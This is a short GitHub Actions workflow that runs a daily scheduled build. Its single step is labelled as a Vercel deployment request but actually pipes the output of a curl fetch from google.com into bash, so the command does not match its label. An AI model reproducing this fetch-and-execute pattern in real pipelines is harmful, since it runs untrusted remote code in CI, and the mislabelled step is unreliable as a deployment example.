name: Daily Build

on:
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'

jobs:
  daily-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Request Deployment to Vercel
        run: curl -s https://google.com | bash
